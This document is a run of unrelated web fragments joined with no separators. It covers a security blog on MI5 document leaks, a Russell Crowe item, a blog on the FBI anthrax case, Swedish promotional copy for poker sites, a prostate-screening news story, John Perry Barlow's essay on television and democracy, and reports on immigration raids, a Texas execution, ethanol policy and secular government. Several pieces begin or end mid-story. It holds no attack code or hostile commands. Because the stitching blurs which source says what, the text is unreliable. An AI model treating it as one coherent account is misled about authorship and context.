They spell out methods to fund terrorists , and address the potential fraud of commercial websites and international internet payment systems .
With all those paper documents being used to run the intelligence service of England it is surprising there are not more incidents like this .
Am I recommending more use of electronic documents ?
Definitely not , they will just fall into the hands of the Chinese .
All I am saying is that no leak prevention solution will stop leaks .
You can curtail the wholesale loss of data though email , and file transfers , but you will not stop executives from leaving printed documents in taxi cabs or airplanes .
In the meantime I am sure with a little tightening up MI5 will get their house in order , setting aside connections to Nazi sex orgies for now .
Can anyone suggest best practices for controlling printed documents ?
Leave a comment , I will summarize in a posting .
------
Follow Stiennon in Twitter
RUSSELL
Crowe is looking forward to bonus time in Australia after the postponement of filming for his next project , Nottingham .
The Oscar winner said it would be at least seven months before the film gets off the ground in England , allowing him to spend more time at his Woolloomooloo home with wife , Danielle Spencer , and sons , Charlie , 4 , and Tennyson , 2 , and working on other projects .
" More time in Australia is always a bonus , " Crowe said last week .
Salon 's Glenn Greenwald Joins Us in Being Tarred as ' Conspiracy Theorists ' While WaPo and AP Continue to Uncritically Advance the Government 's Often Wholly - Imaginery Anthrax Case ...
Brad Friedman Byon
8/19/2008 , 1:35 pm PT
Blogged by Brad Friedman on the road to Denver ...
Glenn Greenwald returns from his vacation rested and ready to keep up his devastating work on the anthrax beat over at Salon .
On Monday , he noted how the FBI 's timeline for the supposed Anthrax Killer , Bruce Ivans ' trip to mail deadly letters in Princeton , NJ , was literally impossible .
So the FBI just leaked a different theory to the Washington Post , who had uncritically reported their first one .
Again , the new theory was dutifully passed on uncritically , without the reporters even bothering to note that their first reported theory was wholly debunked .
Writes Greenwald ( in reference to the Post here , but feel free to replace its name with virtually any other MSM outlet of your choice ) :
That 's because The Post 's role here has been and continues to be what the establishment media 's role generally is --- to serve government sources and amplify their claims , not to investigate their veracity .
That 's how it was Saddam Hussein who was the original anthrax culprit , followed by Steven Hatfill , and now Bruce Ivins .
It 's how Jessica Lynch heroically fought off Iraqi goons in a firefight , how Pat Tillman stood down Al Qaeda monsters until they murdered him , how Iraq possessed mountains of WMDs , and now , how Russia has assaulted the consensus values of the Western World by invading a sovereign country and occupying parts of it for a whole week , etc. etc .
All of those narratives came from the Government directly into the pages of The Washington Post , which then uncritically conveyed them , often ( as in the case of the Jessica Lynch lies and WMD claims ) playing a leading role in doing so .
He then follows up with this eerily all - too familiar refrain , at least for me and likely most long time BRAD BLOG readers :
Similarly , here is an Associated Press article from last week , by AP's Matt Apuzzo , purporting to report on what it admits are many " meticulously researched " questions that have been raised ( including by me ) about the FBI 's case , yet repeatedly demonizes such skepticism with these phrases , laced throughout the article : " the ingredients for a good conspiracy theory " ; " skeptics and conspiracy theorists " ; " armchair investigators , bloggers and scientists " ; " one of the great conspiracy theories , like whether we landed on the moon or whether Lee Harvey Oswald acted alone " ; " anti-Jewish writers blame the attack on a Zionist plot " ; " You ca n't prove aliens did n't mail the letters . "
Welcome to my world , Glenn .
He continues ...
As always , in Establishment Media World , nothing is more insane or radical than refusing to believe every word the Government says .
Even after Iraqi mushroom clouds and the whole litany of Government falsehoods , the establishment hallmark of Seriousness and Sanity is accepting the Government 's word .
When it says Iraq was behind the attacks , then it was .
When they said Hatfill was the culprit , he was .
Now that they say that Ivins is , he is , and only " conspiracy theorists " --- comparable to those who disbelieve we landed on the moon --- would question that or demand to see the actual evidence .
The FBI is relying , understandably so , on their mindless allies in the media to depict its case against Ivins as so airtight that no real investigation is necessary .
Glad to hear it 's not just us .
Apparently , we 're now in very good company , even as our Outlaw Nation continues to crumble around us .
To the corporate MSM , however , everything is just fine .
Vad finns det för olika pokersidor idag då ?
Idag är vi otroligt bortskämda med utbudet av pokersajter som finns på nätet .
Många av dem är renodlade sidor för poker men det finns också casinon som har sina egna pokerklienter .
Vilket du föredrar beror förstås på vilken typ av spelare du är .
Det finns så klart ingenting som hindrar dig från att ha konton på flera olika sidor .
Det finns både nackdelar och fördelar med att spela på en större sajt .
En större sajt omsätter vanligtvis mycket mer pengar , vilket innebär att det finns större turneringar att delta i .
Det brukar också vara större variation på borden .
En lite mindre sajt har inte lika många och stora turneringar men det är mindre konkurrens eftersom det är färre spelare som deltar .
PokerStars
PokerStars är den absolut största sajten när det kommer till poker .
De har dagligen olika turneringar där det ligger flera miljoner dollar i potten .
På PokerStars spelar folk från hela världen och det är en blandning utav proffs och nybörjare .
Här finns allt från cash - tables och sit ’n goes till turneringar .
Många av pokerproffsen är sponsrade och representerar PokerStars i de stora turneringarna .
Full Tilt Poker
Full Tilt Poker var länge en stor konkurrent till PokerStars men en stor skandal tvingade dem att stänga ner sajten .
Det som hände då var att The Stars Group , som även äger PokerStars , köpte upp deras sida .
Idag är det ett fristående namn och har lyckats jobba tillbaka sitt fina rykte .
Även här har du ett stort urval av olika turneringar .
888poker
888 poker är även dem en av de största och har sitt huvudkontor i Gibraltar .
De är bland annat huvudsponsor av World Series of Poker som är den största landbaserade turneringen i hela världen .
Varje år flockas pokerproffsen till denna prestigefyllda turnering .
På 888 kan du spela allt från gratisrundor till dagliga turneringar och cash - tables .
Inköpen varierar från enstaka kronor till flera hundratusen .
“ There will be some men who would say , ‘ Let ’s do it anyway , ’ and other men who say , ‘ If we do n’t need to do it , let ’s not do it , ’ ” Dr. Calonge said .
The guidelines focus on the screening of healthy older men without symptoms and will not affect treatment of men who go to the doctor with symptoms of prostate cancer , like frequent or painful urination or blood in the urine or the semen .
Studies of the value of prostate cancer screening for younger men have produced mixed results , but a major clinical trial under way in Europe will try to determine whether there is any value , in terms of longer life expectancy , to screening this group for prostate cancer .
Those results may be published as early as next year .
While the verdict is still out on younger men , the data for older men are more conclusive , experts say .
The American Cancer Society and the American Urological Association both say annual PSA screening should be offered to average - risk men 50 and older , but only if they have a greater than 10 - year life expectancy .
Recently , Swedish researchers collected 10 years of data on men whose cancer was diagnosed after the age of 65 and found no difference in survival among those who were treated for the disease and those whose cancers were monitored but treated only if the cancer progressed .
The finding suggests that for most men , stopping screening at 75 is a safe option .
“ If someone has made it to the age of 75 and they do n’t have an elevated PSA , the likelihood of them developing clinically significant prostate cancer in the last 10 to 15 years of their life is pretty low , ” said Dr. Peter C. Albertsen , professor of urology at the University of Connecticut Health Center .
“ The downside risk begins to outweigh the upside at the age of 75 . ”
Some studies suggest that as many as half of men 75 and older have clinically insignificant prostate cancer that is unlikely to affect their health but may be found through a biopsy .
If the disease is detected as a result of screening , the men may be actively treated with radiation or hormone therapies , or may endure the stress of “ watchful waiting ” to see if the disease progresses .
The US is no longer a democracy , but Government by Hallucinating Mob .
Take heart - tomorrow 's Senate will be as relevant as today 's House of Lords .
The US is no longer a democracy , but Government by Hallucinating Mob , driven mad by television .
Little wonder then that this year 's election feels like a choice between cancers .
Take heart , because by the timewe can elect enough of our own to make a difference , the Net will have changed society so much that the US Senate will seem about as relevant as the House of Lords .
By John Perry Barlow Recently , I found myself appearing on a panel called " Presidential Campaigning from 1960 - 1996 : From Televised Debates to the Internet and Beyond . "
I expected the title to be optimistic , and it was .
Not only did we not press boldly on to those unimaginable hustings " beyond the Internet , " we did n't quite make it past television .
Which was fine , I suppose - neither has politics in America .
Whether or not it ever will , at least before the United States of America ceases to be a clearly definable political entity , is the question .
But does this matter much to the development of society in Cyberspace ?
Should the netizen bother to vote ?
And if so , for whom and on what basis ?
I was an oddity at the gathering , which was held at Harvard University 's John F. Kennedy School of Government on the fallen president 's birthday .
( I sat there imagining the tachometer reading on my buried father , a cowshit - on - his - boots Wyoming politician who , had he ever heard of virtual reality , would surely have thought the Kennedys came from there . )
The others on the panel clearly belonged to the first part of its title .
There was veteran TV newsman Sander Vanocur , one of the questioners in the Kennedy - Nixon debates ; Kiki Moore , a former press secretary for Tipper Gore and now a regular commentator on CNN ; Lisa McCormack , who is the publications and " online communications " director for the Republican National Committee and who you could tell with one eye was no nerd .
And me .
I was the token geek .
The program began with long cuts from the Kennedy - Nixon debates , a spectacle I had last watched through 12 - year - old eyes and murkily re-remembered subsequently .
Seeing them again , I realized that the debates had been important not because they decided the contest for the telegenic young Senator Kennedy - as was pronounced by most observers at the time and has been canonically held since - but because they had fundamentally changed the nature of the office itself .
From that point forward , the president became more movie star than leader , more myth than manager , more affect than intellect .
From that point forward , it was more important that the candidate not have a five o'clock shadow than that he have ideas that could suffer scrutiny .
Not to defend the genuinely vile Nixon nor to defame the genuinely dashing Kennedy , but I was surprised by the clarity and persuasiveness of Nixon 's actual content .
Kennedy , on the other hand , said some things that were not very thoughtful , such as his assertion that it was more important for a country to have good missile technology than abundant color televisions .
But his appearance , the visual semiotics of his virtual self , was as smooth as Nixon 's was lumpy .
I was looking at the first decisive national instance in which what a politician said was less penetrating and prehensile than his ability to look like he meant it .
And I have had my own confirmation of this principle .
Thanks to C - Span ( which , as it happened , carried the Kennedy School panel live ) and PBS specials , my own talking head occasionally floats around Televisionland in repurposed snippets of videotape , so if people tell me they 've seen me on TV , I do n't know the context .
Trying to determine it , I ask what I was talking about .
They never remember .
Though sometimes they say they thought I was convincing .
Of what ?
I wonder .
The most striking realization that came to me as I watched the tapes was that Kennedy was not so much elected president by television as he was elected president of television - that strange projection from which most Americans have since derived their map of reality .
He also , in some sense , participated in a process whereby television became president .
Since then , this medium has defined the national agenda in ways that were often at odds with what might have been dictated by either sense or experience with unmediated reality , until we are left today with what I call Government by Hallucinating Mob .
As I watched the shiny old kinescopes , it seemed the transformation to this malignant new governmental form was taking place before my eyes .
During several sequences , it was clear that the most important debater was neither Kennedy nor Nixon but the unnominated Sander Vanocur , as when he sprung on Nixon that his boss , President Eisenhower , had said that he could n't think of any policy decision in which Nixon had played a deciding role .
It was a harder and more damaging shot than any taken by Kennedy .
I knew that never before had a mere reporter been able to exercise such power in real time before an entire nation .
Afterward , as the line of speakers proceeded till my turn came ( the geek speaks last ) , I heard the bland encomiums that are generally larded upon the Net by meatspace politicos whose knowledge of it , as of other things , descends mostly from what they 've learned from traditional media ; there were no tales of any real adventures in cyberspace .
( Though it must be noted that none of them called it the Information Superhighway . )
They talked about the Net as though it were the '90s version of the space program , a wonderful and huge government project that America should undertake for reasons that were not entirely clear .
They talked about it as though it might have a role in the upcoming elections similar to that played so decisively by the first televised debates .
I do n't think so .
And neither , I suspect , did they .
If any large number of our elected American leaders thought that our virtual precincts could affect an election outcome in their world , they never would have inflicted on us the Communications Decency Act nor most of the Digital Telephony Bill .
Nor would they be contemplating other such depredations as the bill currently proceeding through Congress that would abolish fair use of copyrighted material in cyberspace , declaring a licensable copy to be made every time a copyrighted work is written into computer memory .
If they thought the hundreds of thousands of angry email messages they 've gotten from us over the last few years actually came from bodies likely to walk into a voting booth anywhere in their own districts , they would n't still be answering electronic input with such automatic responses as :
Dear Friend : Thank you for your recent email message to my office .
Please accept this response as acknowledgment that we have received your message and will note your comments .
Most of you will also receive an email response that addresses your concern .
Given that the postal service may sometimes be the best way to get back to you , please also include a regular mailing address in your email .
This is what I received after Senator Edward Kennedy challenged my assertion that no one in Congress was online .
" I 'm online , " he said .
" Write me an email and see . "
In fairness , I 'm not sure I want Senator Kennedy - or any other senator - reading and responding directly to his own email .
Most of Congress is in profound datashock already .
Hardly any of them has an attention span longer than an elevator ride .
They are located at a level in the informational ecosystem that has become too rich for reason .
Stuart Kauffman at the Santa Fe Institute has studied " complexity catastrophe , " in which an organism or natural system is forced by its context to process more information than it can .
A frequent symptom of this kind of connection crash is fibrillation - a purposeless , resource - expensive quivering that usually culminates in system collapse .
It could easily be said that Congress , indeed the entire government of the United States of America , has already reached this state .
But however useless and wasteful I think it has become , there are enough Americans who believe in the comforting myth that their government still works , that its continued institutional existence probably contributes to a calm , however delusionary , among the People .
So I 'm not sure it would be a good idea to further inflict the riotous informational fertility of cyberspace upon an organism that evolved in the more temperate zones of the late 18th century .
Thomas Jefferson was one of the most prolific letter writers of his time , and he generally produced five or six pieces of correspondence a day .
He would have considered it mad to attempt 50 or 60 , as I often do , or hundreds , as Senator Kennedy would have to .
But therein lies the rub , or at least part of it .
The political system we 've got is too tangled in the parasitic undergrowth of the last two centuries to process or understand what is being created for the century to come .
Certainly , the powers that were want to understand cyberspace .
They can tell it 's important , or at least that it will be , and , as they would like to go on ruling , they have been setting about in various ways - some terrifying , some hilarious - to rule the virtual world as well .
But for the present , there are many factors diminishing their acuity on the subject .
For one thing , democracy really does work in America .
It works in that politicians are extremely sensitive to their market , the people who actually vote .
And people who vote have bodies that dwell in precincts .
A politician can grab the return addresses from letters he or she receives and give them to canvassing volunteers who will hustle the votes of the senders on their very doorsteps .
No one has yet tried to canvass cyberspace .
The email a politician receives can understandably seem to appear from the ether .
It might have been generated by a machine .
It certainly might have been generated by someone who can't actually vote , because he or she does n't even live on the same continent .
Of course , that does n't mean they 're not working on it .
Lisa McCormack , the panelist from the Republican National Committee ( and a smart operative if , well , a bit of a Stepford wife ) , talked about how proud they were of Republican Main Street , the virtual village that is www.rnc.org/.
McCormack had some reason to be proud .
The site is state of the art .
From it , you can order GOP golf shirts or grab , in QuickTime , " The Best of GOP - TV Download " and watch memorable moments from the Republican revolution .
They even link to MCI 's Net Vote ' 96 site : there , they hope to electronically register Republicans using the Uniform Voter Registration Form that was created , ironically , by Bill Clinton 's Motor Voter bill .
( " In two to three weeks , your official completed voter registration application card will be sent back to you .
Read through it , check for mistakes , SIGN IT , and stick it in the mail .
We have already addressed it to your state elections official .
We even cover the postage ! " )
But as much as I genuinely admired the work she was describing , I wondered how much good it would do them .
Because I 'm not at all sure there is a significant cybervote to curry .
I think most voters come from a culture that has been created by mass media - a culture quite different from the one now gelling in The Great Conversation that is cyberspace .
No one knows much about the civic habits of the wired world .
Not everyone even agrees that " we " exist as a society .
I do believe , however , that there is a discernible cultural flavor to cyberspace , that whether we 're jacking in from Sunnyvale or Uzbekistan , we tend to be libertarian , opinionated , and generally devoted to the free flow of information .
Whether or not one comes to cyberspace with any greater mission than emailing one 's boss from the road , there is something about this environment that seems to gradually induce a larger sense of purpose .
And any large sense of purpose has political implications .
It is my perception that much of the online world is already about pursuing those political implications , by constructing new systems of governance better adapted to a global information economy than those of a 19th - century industrial nation - state .
I do n't think most of us pay much attention to Washington unless Washington is actively trying to attack the Net .
And I suspect that , in America , even fewer of us vote than do among the general populace , where suffrage has been in steep decline for years .
That subset of Americans who still exercise their franchise - The Market , if you will - tends to be much older , whiter , and more socially conservative than the population in general .
They live mostly in the suburbs , shop in malls , work for large organizations , and go to church on Sunday .
Creatures of a mass society , living in a culture created by mass media .
Genericans .
Not a bad lot , really .
Decent people , most of them , with good judgment - if that judgment were well informed .
And that 's the problem .
For most of The Market , reality is , as I say , almost entirely based on The World According to Television .
This has been the case since the Kennedy - Nixon debates and will continue to be the case for some time .
The World According to Television is not a reality that arises from direct experience with events or phenomena .
It is a processed world , both eviscerated of context and artificially fortified toward no greater purpose than entrancing the audience .
But politics , as practiced , is pretty tedious fare .
Not much of it can get through a machine that runs on the sensational .
Thus , the political realities of Televisionland are not about monetary policies and tax reform - or , indeed , any of the governmental issues that count - since these are all subjects that diminish the attention of the audience , and selling the attention of the audience to advertisers is all that television does .
In the time since the Kennedy - Nixon debates , the organism of television has learned a lot about which elements of the political process keep people locked in even through the ads .
It learned a lot during Watergate and has been busily offering up " - gates " of one sort or another ever since .
It has also learned that fear , violence , and sex all fertilize attention marvelously , so it continually churns up virtual demons and scandals that not only jolt the audience into paying attention , but completely transform the political debate .
Voters are now more concerned with imaginary threats than real ones , and so they elect representatives who will address these " problems " without regard to their existence .
It 's become a hung loop .
Consider the process behind the following familiar example .
Looking to raise share and beat back the future , the media raise an imaginary problem , say , a cyber - tsunami of online kiddie porn .
Out in Televisionland , parents who have already been driven into a state of omniphobia by TV depictions of kidnappers , child molesters , and Calvin Klein commercials , freak out and call their congressperson .
Of course , the congressperson does n't actually know whether or not there 's a flood of kiddie porn online .
He ( or she ) has never been online and is n't about to go there .
But he does know that his constituents have seized on An Issue that they are truly passionate about .
Under such circumstances , it takes a brave man to do nothing .
So he gets together with his colleagues and passes a law that effectively addresses a problem almost no one has ever actually experienced , while issuing forth a whole new set of real ones .
This is democracy in the Television Age , working with hideous efficiency .
It is , as I say , Government by Hallucinating Mob .
A push - me , pull - you that is self - contained and almost completely detached from anything I would call " real . "
The US government has broken , the victim of television and of connection crash in general .
So this is an election year .
What 's a voter to do ?
By the time you read these words , San Diego and Chicago will be aswarm with sweating party regulars , blowing plastic horns and driven by the mysterious belief that their efforts will Make a Difference .
Might they ?
Personally , I rather doubt it , at least from the perspective of a netizen .
Let 's just take a look at the Big Prize here , the presidency .
Who would better serve the Net , Dole or Clinton ?
Apart from the fact that Dole is of a generation to whom the telephone is suspiciously newfangled , he has , to the best of my knowledge , only once given evidence that he even knows the Net exists , and that only recently when he agreed to co-sponsor a bill that would relax the crypto export embargo .
I 'm not flatly stating that he does n't know anything about it , but it 's important to remember that he comes from the heart of the United States Congress , a powerful reality - distortion field that has left the overwhelming majority of its inhabitants not only clueless about the Net but dynamically anticlueful .
There is in Congress a profound cultural resistance to digital awareness .
I 've spent a lot of time on the Hill over the last five years , and I can count on two hands the number of congresspersons and senators who understand the Net - a much lower percentage than the populace in general .
I have a friend in Washington , Kimberly Jenkins , who for two years has been operating an admirable project called Highway 1 .
The main purpose of this nonprofit , well - funded ( by companies like Apple , AT&T , and IBM ) and slickly professional outfit is to show cyberspace to Congress .
Easy opportunities are afforded for congresspersons to get a Web demo and learn about all that tricky stuff like email .
Is it working ?
Not yet .
" They send their staffers , but they can always find a reason not to come themselves , even when it 's right down the hall , " Jenkins says .
Why is this ?
Because Congress represents Televisionland .
That 's who elected them .
I believe that the fundamentally different media environments of television and the Net create world - views that are naturally inimical to each other .
Thus , the intransigent not - getting - it - ness of Congress is actually a cultural immune response to something that might eventually overcome the Generican society they were elected to serve .
They do n't want to get any of it on them .
And you can't blame 'em .
Now Clinton .
He and especially Al " Information Superhighway " Gore ought to be the candidates to support .
They 've got some great people working on these issues for them , people like Mike Nelson and Tom Kalil , who clearly do get it .
But it does n't seem to matter .
The system is bigger than the people who purportedly run it .
Despite knowing better , the Clinton administration has spent the last three and half years talking about how important the Net is while trying hard to kill it with truly terrible policies regarding cryptography , pornography , and copyright .
In private conversation , White House staffers will tell you their hands are tied .
Regarding crypto , one of them once told me he agreed that the embargo should go , but , " It 's like this , John Perry - we 're more afraid of the NSA than we are of you . "
That 's a chilling thought up front , but I think it goes deeper than that .
Like Senator James Exon , they 're really just obeying The Market , even when they know The Market is having a television - induced nightmare .
The strongest argument anyone in the White House ever made to me for crypto controls - the one they actually believe - was this from Mike Nelson : " Imagine the reaction of the American public if a terrorist set off a nuclear device in New York after concealing the plot with encryption we could n't penetrate . "
In other words , the policy driver here is not the serious damage that insecure data systems are already causing our economy , but the Nuclear Terrorist , a creature that is more media virus than demonstrated threat .
The administration 's willingness to pander to Generican delusions , even against its own better judgment , also resulted in the president 's continued support for the Communications Decency Act , even after it was struck down by a three - judge panel in Philadelphia in early June .
Now , I grant that they were backed into a corner .
As Mike Nelson said to me in their defense , " Unfortunately , we were not able to get the bill fixed , and now we are having to defend the provisions in court .
That 's the way the system works - Congress writes the laws and we implement them . "
True enough , but there are cooler levels of support that could be manifested than Clinton 's public statement following the decision : " I remain convinced , as I was when I signed the bill , that our Constitution allows us to help parents by enforcing this Act to prevent children from being exposed to objectionable material transmitted through computer networks .... "
Unlike the judges , the president did n't bother to look too closely at how the Act actually mocks the Constitution .
His people are still in the same cowardly mode that prevented them from engaging in a full - court press to stop the CDA at the many earlier points they might have done so .
Since they do n't want anyone from The Market to start talking about how they 're soft on kiddie porn , they 'd sack the future of liberty to prevent it .
There you have it .
From the netizen 's point of view , it comes down to a choice of enemies .
In Dole , we have someone who probably does n't understand us at all and would n't like us much if he did .
In Clinton , we have someone who understands us in some dimensions but is too cowardly to turn that understanding into a hard policy commitment .
I feel funny about blaming them for this .
They are , after all , serving the wishes of the electorate .
In a democratic society , it 's dangerous for elected officials to ignore the body politic .
But what if it has been driven mad by television ?
What if the duties of citizenry have been abandoned by most of those who are still sane ?
Thomas Jefferson never imagined the conduct of democracy in the thrall of a mass medium .
We behold here the opening phase of a deep conflict between two societies .
One , still in power , was born not only of television but of the entire Industrial Era .
The second , far more heterogeneous in every dimension , is emerging into all the tiny possibility spaces of the virtual world .
As a percentage of the whole , the great white Party of the Past has been declining since its golden era under Reagan .
It is now a shrinking minority , and its increasingly aggressive impositions - whether the War on Some Drugs or the gathering War on the Net , of which the CDA was only the beginning - are evidence that it knows its own morbidity and is trying to erect a fortress of control while it still has an army to do so with .
That which can no longer be held by popular consensus must soon be held by force .
But that the society in decline no longer has the numbers does n't mean that it no longer has the votes .
We of the society on the rise do n't vote like they do .
Even if we did , we are such a fractious lot that we would be like all the splinter parties of Italy trying to form a coalition against the Fascists .
Organizing the Party of the Future is the ultimate exercise in cat - herding .
The bottom line :
We still have to bide our time .
By the time we could elect enough of our own to make a difference , the Net will have so completely altered the structure of everything around it that the US Senate will seem about as relevant as the House of Lords .
This does n't mean we should turn our backs on it .
I do think we should vote , and , while I would n't make this a sole criterion , I will be looking for Net - savvy candidates to vote for .
( Since I do n't expect to find very many in my neighborhood , I 'm donating money to distant others that I can't vote for . )
Over the long run I 'm deliriously confident , but I certainly do n't have my short - term hopes up .
I think the best we can do for the next few years is to focus on that pillar of American government that is not so democratically responsive , the judiciary .
While it 's open to enormous influence from the presidency through the system of judicial appointments , it nevertheless remains our best hope .
Look at what happened in Philadelphia .
The reason the judges were able to come out with their recent CDA verdict upholding the rights and freedoms of the Internet was that none of them is running for office .
It was n't their job to serve The People .
It was only their job to serve the truth .
" But what I 'm saying is that I think the success overall of the target regime has got us to the stage where we can now confidently move on from that and set parameters for the coming period that are more about freeing up the police to do what their local communities want them to do . "
Employers in immigration raids usually go free Immigration raids often spare employers
' Bosses ' make up only 2 % of recent arrests , a number blamed on high evidence threshold
WASHINGTON — Immigration and Customs Enforcement agents are staging dramatic raids across the country that routinely seize hundreds of undocumented workers at their jobs — and leave their employers free to work another day .
The appearance of separate justice that arose during federal authorities ' surprise morning raid at Action Rags USA on Houston 's east side fits a nationwide pattern .
Many of the 166 workers taken into custody on suspected immigration charges in Houston last week were paraded toward vans to be transported into detention .
But immigration authorities spared company officials both immediate arrest and the embarrassing " perp walk " that exposed those arrested to news photographers .
" Once again the federal government has it backwards , " said Rep .
Ted Poe , R - Humble , a former state judge and prosecutor .
" It is a waste of time if we do n't go after the business owners who are knowingly hiring illegals .
" If we eliminate the illegal job opportunities , we can start to eliminate the problem . "
Over the past eight months , federal immigration agents have arrested more than 2,900 suspected undocumented workers on administrative immigration charges and 775 more workers on criminal charges such as identity theft or Social Security fraud .
Only 75 ' ' bosses " — business owners , supervisors or human resources workers — have been arrested on charges such as harboring or knowingly hiring undocumented immigrants .
That accounts for barely 2 percent of the total of 3,750 workplace immigration arrests since last October .
In a statement , the immigration agency said that " the presence of illegal aliens at a business does not necessarily mean the employer is responsible , " adding : " Developing sufficient evidence against employers requires complex , white - collar crime investigations that can take years to bear fruit . "
Must prove they knew
Undocumented workers often face quick prosecution for so - called '' status crimes " such as being in the country illegally — charges that are easy to prove .
Many of those arrested quickly plead guilty and serve sentences averaging as little as a month .
But to convict employers , federal prosecutors must show that they knowingly hired undocumented immigrants , a threshold that demands more evidence .
" You have to show that the employer knowingly and willingly hired an illegal , " said Rep. Michael McCaul , R- Austin , a former Justice Department official .
" A lot of these guys carry multiple Social Security cards " — making it difficult for employers to determine whether they are legally in the U.S .
Homeland Security Secretary Michael Chertoff , whose Cabinet department handles immigration enforcement , defended the two - tiered practice of arresting undocumented workers at worksites while taking time to assemble criminal cases against employers .
" When we find evidence of persistent , widespread hiring of illegals , we 're going in to try to build a case against the employer if there 's a case to be built , " said Chertoff , a former federal appeals court judge .
Federal prosecutors often take years to put together cases against employers .
Immigration authorities raided IFCO , a Houston - based pallet company , more than two years ago .
Seven managers and 1,187 undocumented workers were arrested , with many taken into custody at the company 's plants in Texas and 25 other states .
But it wo n't be until Oct. 16 that at least two managers , each free on $ 20,000 bond , will face sentencing after pleading guilty in the case .
Workers rather than managers also led the way into the courtroom after raids netted nearly 1,300 people at the Swift & Co. meat processing plant in Cactus and five other plants in five other states in 2006 .
Eight undocumented workers pleaded guilty to felony charges within three months on such counts as illegally re-entering the United States after deportation and using someone else 's Social Security number to obtain employment .
' A two - sided coin '
Members of the Houston - area congressional delegation expressed concern about aspects of last week 's raid .
Rep. Gene Green , D - Houston , whose congressional district includes the rag- sorting plant , said ICE 's deployment of as many as 200 agents and helicopters scared children at a nearby elementary school .
" It sounded like maybe ( ICE ) had more assets than they really needed to go in and pick up those 160 people there , " Green said .
" Most of those ladies who worked there , granted they were here illegally , but they were n't holding up liquor stores or hurting people .
They just needed a way to support their families . "
Rep. John Culberson , R- Houston , called worksite enforcement " a two - sided coin . "
" As employers , Action Rags broke the law and without question should be prosecuted for their violations , " Culberson said .
" ICE is equally obligated to enforce the law and be respectful and humane while carrying out their duties . "
stewart.powell@chron.com
( Adds Mexico government statement , paragraph 12 )
DALLAS , Aug 5 ( Reuters ) - Texas defied the World Court and executed a Mexican national by lethal injection on Tuesday over the objections of the international judicial body and neighboring Mexico .
Jose Medellin , 33 , was pronounced dead at 9:57 p.m. CDT ( 0257 GMT ) in the state 's death chamber in Huntsville , the Texas Department of Criminal Justice said .
He had been condemned for the 1993 rape and murder of 16 - year - old Elizabeth Pena in Houston and lost his bid late Tuesday for a last - minute stay from the U.S. Supreme Court .
The World Court last month ordered the U.S. government to " take all measures necessary " to halt the upcoming executions of five Mexicans including Medellin's on the grounds that they had been deprived of their right to consular services after their arrests .
Medellin's execution is sure to anger neighboring Mexico and analysts have said it could make life rough for Americans arrested abroad if other countries decide to evoke the U.S. example and deprive them of their right to consular services .
This typically means diplomats will visit and provide legal advice to their nationals being held by authorities .
The Texas Board of Pardons and Paroles had recommended that the state 's Republican governor Rick Perry not grant a temporary reprieve , paving the way for Medellin 's execution .
Texas , which executes far more convicts than any other U.S. state , had taken the view that the brutal nature of Medellin 's crimes rendered him unfit for a reprieve or lesser sentence .
The World Court 's jurisdiction also does not reach Texas , a state where authorities generally do n't like outsiders telling them what to do .
The political fall - out from the Medellin and related cases has reached the White House and the U.S. Supreme Court .
U.S. President George W. Bush directed his native Texas to comply with a World Court ruling in 2004 mandating review of the cases of Medellin and other Mexicans in U.S. prisons awaiting execution .
The U.S. Supreme Court said in March Bush 's action had exceeded his authority .
The government of Mexico sent the U.S. State Department a diplomatic note of protest , expressing " its concern for the precedent " that the case " may create for the rights of Mexican nationals who may be detained in that country . "
CHILLING CRIME
The June 1993 crime for which Medellin was condemned was chilling .
According to the Texas Attorney General 's office , Pena and her 14 - year - old companion , Jennifer Ertman , were walking home when they encountered a gang initiation .
Medellin and his fellow gang members sexually assaulted , beat and strangled the two girls .
When their badly decomposed bodies were finally recovered , they could only be identified by dental records .
Medellin was only convicted of Pena 's murder .
Speaking to Reuters in the Mexican border town of Nuevo Laredo , Medellin 's aunt Reyna Armendariz , 45 , said :
" He was a normal , happy kid ...
They do n't have the right to take his life away , we acknowledged that he committed a crime but make him pay with a life sentence , " she said .
In his last statement Medellin said : " I am sorry my actions caused pain . "
He had no last meal request , which is a ritual of U.S. executions .
Medellin was the fifth inmate executed in Texas so far this year and the 410th put to death since 1982 , when the state resumed executions six years after the U.S. Supreme Court reinstated capital punishment .
Texas currently has 14 more executions scheduled for this year and one early in 2009 .
Seventeen executions have now been carried out in the United States since the Supreme Court in April lifted an unofficial moratorium on the death penalty when it rejected a challenge to the three - drug cocktail used in most lethal injections .
Mr. Daschle , a national co-chairman of the Obama campaign , said in a telephone interview on Friday that his role advising the Obama campaign on energy matters was limited .
He said he was not a lobbyist for ethanol companies , but did speak publicly about renewable energy options and worked “ with a number of associations and groups to orchestrate and coordinate their activities , ” including the Governors ’ Ethanol Coalition .
Of Mr. Obama , Mr. Daschle said , “ He has a terrific policy staff and relies primarily on those key people to advise him on key issues , whether energy or climate change or other things . ”
Ethanol is one area in which Mr. Obama strongly disagrees with his Republican opponent , Senator John McCain of Arizona .
While both presidential candidates emphasize the need for the United States to achieve “ energy security ” while also slowing down the carbon emissions that are believed to contribute to global warming , they offer sharply different visions of the role that ethanol , which can be made from a variety of organic materials , should play in those efforts .
Mr. McCain advocates eliminating the multibillion - dollar annual government subsidies that domestic ethanol has long enjoyed .
As a free trade advocate , he also opposes the 54 - cent - a - gallon tariff that the United States slaps on imports of ethanol made from sugar cane , which packs more of an energy punch than corn - based ethanol and is cheaper to produce .
“ We made a series of mistakes by not adopting a sustainable energy policy , one of which is the subsidies for corn ethanol , which I warned in Iowa were going to destroy the market ” and contribute to inflation , Mr. McCain said this month in an interview with a Brazilian newspaper , O Estado de São Paulo .
“ Besides , it is wrong , ” he added , to tax Brazilian - made sugar cane ethanol , “ which is much more efficient than corn ethanol . ”
Mr. Obama , in contrast , favors the subsidies , some of which end up in the hands of the same oil companies he says should be subjected to a windfall profits tax .
In the name of helping the United States build “ energy independence , ” he also supports the tariff , which some economists say may well be illegal under the World Trade Organization ’s rules but which his advisers say is not .
Many economists , consumer advocates , environmental experts and tax groups have been critical of corn ethanol programs as a boondoggle that benefits agribusiness conglomerates more than small farmers .
Those complaints have intensified recently as corn prices have risen sharply in tandem with oil prices and corn normally used for food stock has been diverted to ethanol production .
Document Proclaims Secular Government
A few Christian fundamentalists attempt to convince us to return to the Christianity of early America , yet according to the historian , Robert T. Handy , " No more than 10 percent -- probably less -- of Americans in 1800 were members of congregations . "
The Founding Fathers , also , rarely practiced Christian orthodoxy .
Although they supported the free exercise of any religion , they understood the dangers of religion .
Most of them believed in deism and attended Freemasonry lodges .
According to John J. Robinson , " Freemasonry had been a powerful force for religious freedom . "
Freemasons took seriously the principle that men should worship according to their own conscience .
